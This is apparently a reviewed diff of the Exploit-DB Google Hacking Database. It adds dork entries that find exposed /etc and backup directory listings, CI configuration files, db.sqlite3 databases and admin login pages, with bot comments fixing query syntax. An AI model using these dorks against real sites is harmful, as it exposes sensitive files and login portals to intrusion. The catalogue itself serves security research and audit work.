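Review bot: the dork string in entry 8162 is malformed: `Index of&quot; intext:&quot;source_code.zip` opens with a stray closing quote, never closes the second quote, and lacks the `intext:` operator before `Index of`, unlike the sibling entries in this commit which use the `intext:&quot;Index of&quot; intext:&quot;...&quot;` form. Suggest `intext:&quot;Index of&quot; intext:&quot;source_code.zip&quot;` in shortDescription, textualDescription, query and querystring.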
@ -38679,6 +38694,66 @@ misconfigured servers.
<date>2023-04-06</date> <date>2023-04-06</date>
<author>Monirul Islam</author> <author>Monirul Islam</author>
</entry> </entry>
<entry>
<id>8166</id>
<link>https://www.exploit-db.com/ghdb/8166</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;/etc&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;/etc&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;/etc&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;/etc&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8163</id>
<link>https://www.exploit-db.com/ghdb/8163</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;backend/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;backend/&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;backend/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;backend/&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8161</id>
<link>https://www.exploit-db.com/ghdb/8161</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8165</id>
<link>https://www.exploit-db.com/ghdb/8165</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry> <entry>
<id>7717</id> <id>7717</id>
<link>https://www.exploit-db.com/ghdb/7717</link> <link>https://www.exploit-db.com/ghdb/7717</link>
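Review bot: the `# Date:20/04/2023` header line in all four new textualDescription blocks (8166, 8163, 8161, 8165) has no space after the colon and uses day/month/year, while the `<date>` element of the same entries is ISO `2023-04-20`; suggest `# Date: 2023-04-20` so the header matches the element and the spacing of the `# Exploit Author:` line.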
@ -38694,6 +38769,21 @@ misconfigured servers.
<date>2021-11-09</date> <date>2021-11-09</date>
<author>Parth Surati</author> <author>Parth Surati</author>
</entry> </entry>
<entry>
<id>8164</id>
<link>https://www.exploit-db.com/ghdb/8164</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;plugin/&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry> <entry>
<id>7683</id> <id>7683</id>
<link>https://www.exploit-db.com/ghdb/7683</link> <link>https://www.exploit-db.com/ghdb/7683</link>
@ -47987,6 +48077,21 @@ Author: Abhinav Porwal
<date>2021-10-27</date> <date>2021-10-27</date>
<author>MD. Rimel</author> <author>MD. Rimel</author>
</entry> </entry>
<entry>
<id>8167</id>
<link>https://www.exploit-db.com/ghdb/8167</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of db.sqlite3</shortDescription>
<textualDescription># Google Dork: intitle:index of db.sqlite3
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: Shebu</textualDescription>
<query>Re: Thank you for your submission! Re: intitle:index of db.sqlite3</query>
<querystring>https://www.google.com/search?q=Re: Thank you for your submission! Re: intitle:index of db.sqlite3</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>Shebu</author>
</entry>
<entry> <entry>
<id>7368</id> <id>7368</id>
<link>https://www.exploit-db.com/ghdb/7368</link> <link>https://www.exploit-db.com/ghdb/7368</link>
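Review bot: entry 8167 carries mail-client residue in `<query>` and `<querystring>`: both have `Re: Thank you for your submission! Re: ` prefixed to the dork, so the generated search URL queries the subject line rather than the dork. Suggest `<query>intitle:index of db.sqlite3</query>` and `https://www.google.com/search?q=intitle:index of db.sqlite3`, matching the shortDescription.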
@ -78027,6 +78132,21 @@ https://ch.linkedin.com/in/schmidbruno
<date>2021-11-15</date> <date>2021-11-15</date>
<author>Arindam Saha</author> <author>Arindam Saha</author>
</entry> </entry>
<entry>
<id>8168</id>
<link>https://www.exploit-db.com/ghdb/8168</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;
# Pages Containing Login Portals
# Date:20/04/2023
# Exploit Author: Bhavin Amesara</textualDescription>
<query>inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>Bhavin Amesara</author>
</entry>
<entry> <entry>
<id>7387</id> <id>7387</id>
<link>https://www.exploit-db.com/ghdb/7387</link> <link>https://www.exploit-db.com/ghdb/7387</link>
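Review bot: `inurl: &quot;/admin&quot;` in entry 8168 has a space between the `inurl:` operator and its argument, so the operator applies to nothing and `/admin` becomes a plain search term; the other entries in this commit attach the operator directly (`intext:&quot;...&quot;`). Suggest `inurl:&quot;/admin&quot; intitle:&quot;Admin Login&quot;` in shortDescription, textualDescription, query and querystring.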